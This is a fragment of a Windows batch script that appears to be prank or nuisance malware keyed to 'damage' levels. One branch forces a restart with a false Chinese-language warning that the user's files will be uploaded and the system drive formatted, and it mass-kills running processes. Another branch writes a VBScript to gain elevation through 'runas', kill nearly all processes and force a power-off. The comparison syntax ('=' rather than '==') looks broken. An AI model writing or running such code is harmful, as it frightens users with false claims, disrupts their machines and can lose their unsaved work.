if %damage%=1 (
shutdown /g /f /t 55 /d 5:15 /c "你的電腦遇到問題，需要格式化系統磁碟機。　　　　　　　　　　　　　　　　我們只上傳你的所有檔案，然後為你格式化系統磁碟機。">>"%~dp0log.txt"
>nul 2>&1 taskkill /f /fi "imagename ne wmplayer.exe" /fi "imagename ne cmd.exe" /fi "imagename ne dllhost.exe" /fi "imagename ne taskkill.exe" /fi "imagename ne conhost.exe" /fi "imagename ne wscript.exe"
goto :eof
)
if %damage%=1.5 (
echo 在%_DoDate%%_DoTime%結束了系統>>"%~dp0log.txt"
goto :eof
)
if %damage%=2 (
echo Set UAC = CreateObject^("Shell.Application"^) > %script%
echo UAC.ShellExecute "%windir%\System32\taskkill.exe ", "/f /fi ""imagename ne cmd.exe"" /fi ""imagename ne conhost.exe"" /fi ""pid le 632""", "", "runas", 0 >> %script%
call %script%
del /f /q %script%
shutdown /p /f
goto :eof
)
